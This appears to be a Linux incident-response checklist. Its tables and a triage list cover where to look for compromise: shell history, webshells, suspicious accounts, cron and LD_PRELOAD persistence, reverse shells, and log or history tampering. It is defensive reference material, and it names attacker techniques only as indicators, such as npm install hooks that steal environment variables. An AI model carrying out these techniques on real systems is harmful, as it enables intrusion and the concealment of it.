What | Where | Notes |
---|---|---|
review shell history files | .*_history | |
temp. editor files | .vi/.vim/.lesshst/sqlite* |
What | Where | Notes |
---|---|---|
hidden files | ||
temp. files | /tmp, /dev/shm | look in /etc/fstab for tmpfs |
incorrect permissions | ||
file owners | e.g, incorrect withing web root | |
symlinks/aliases | ||
SUID/SGID |
What | Where | Notes |
---|---|---|
scan for webshells | web root | limit to know file extentions & file size |
upload/download activity | ftp, curl, wget, perl/python, scp, sftp, browser history, web logs |
What | Where | Notes |
---|---|---|
suspicious software installed via packge manager | (yum.log, dpkg.log...) | nmap, openssh... |
sources within package managers | ||
pre/post scripts/commands from dependencies with package managers | e.g. stealing env. variables or executing something malicious after install with npm | |
application specific logs | database etc. | |
kernel modules | ||
suspicious accounts | /etc/passwd | look for users with UID 0:0 (root) & default shells |
suspicious accounts | /etc/sudoers | |
suspicious accounts | /etc/shadow | look for accounts with no password set |
env variables | echo out env variables & also look for scripts/tools which are doing the same as sensitive information may be contained within them |
What | Where | Notes |
---|---|---|
SSH | password authentication permitted | |
SSH | root login permitted | |
SSH | max failed logons | |
3rd party within web root | outdated CMS, file upload functionality, incorrect permissions and file validation on uploads |
What | Where | Notes |
---|---|---|
numerous failed attempts | single user | |
numerous failed logons | /var/log/(b | u |
SSH | ssh -T | |
SSH | *known_hosts | |
priv. escalation | sudo/su (/var/log/auth*.log*, /var/log/sudo*.log*) | |
correlation of source Ip/hostname for users logging on | easy to see shared accounts/logging in from places that arent normal | |
from suspicious processes | web server processes | e.g., explicit creds to auth. and logon process is C:\Windows\System32\inetsrv\InetMgr.exe |
What | Where | Notes |
---|---|---|
cron jobs | ||
init.d scripts | ||
symlinks | ||
trojanized binaries | ||
added to .bashrc/.profile/.bash_aliases | ||
web browser plugins/extentions/addons | ||
LD_PRELOAD | ||
LD_LIBRARY_PATH | ||
Upstart | ||
SysVinit | ||
webshells |
What | Where | Notes |
---|---|---|
processes with no file on disk | ||
reverse shells/tunnelers/listeners | CLI args. via Auditd | |
parent/child relationships |
What | Where | Notes |
---|---|---|
sockets | ||
DNS cache | ||
hosts file | /etc/hosts |
What | Where | Notes |
---|---|---|
tampering with shell history | UNSET, HISTSIZE, > /dev/null | |
gaps within logs | /var/log/ files and/or web logs | (e.g., attacker using something like white cat log cleaner) |
What | Where | Notes |
---|---|---|
Distro info. | /etc/*-release | |
Install date | /etc/ssh/ssh_host_*_key files | usually created during install |
System name | /etc/hostname | |
IP address(es) | /etc/hosts | static |
IP address(es) | /var/lib/dhclient | DHCP |
Timezone | /etc/localtime | needs to be decoded, strings or zdump |
What | Description | Notes |
---|---|---|
AuditD | exec & connect , file integrity, priv. escalation |
epoch in () is key to track/correlate additional event entries |
- Review shell history
- Review tmpfs (/tmp, /dev/shm, tmpfs in /etc/fstab etc.)
- Review history files of edit applications for files accessed/changed (.lesshst, .viminfo etc.)
- Look for hidden files/directories
- Review hits for webshell and A/V scans
- Look at listening ports
- Look at process listing (CLI, working directories, parent/child relationships, uptime etc.)
- Rewview SSH related files (authorized_keys, known_hosts, sshd_config etc.)
- Stack privileges of files/directories to spot excessive privileges
- Stack owner/group of files/directories to spot anomalies
- Review crontab
- Query IPs/file hashes (known trojanized binaries, C2's etc.)
- Review installed applications from package managers
- Consolidate file listings into timeline view -> filter/grep/time slice
- Look at shell's for users (/etc/passwd)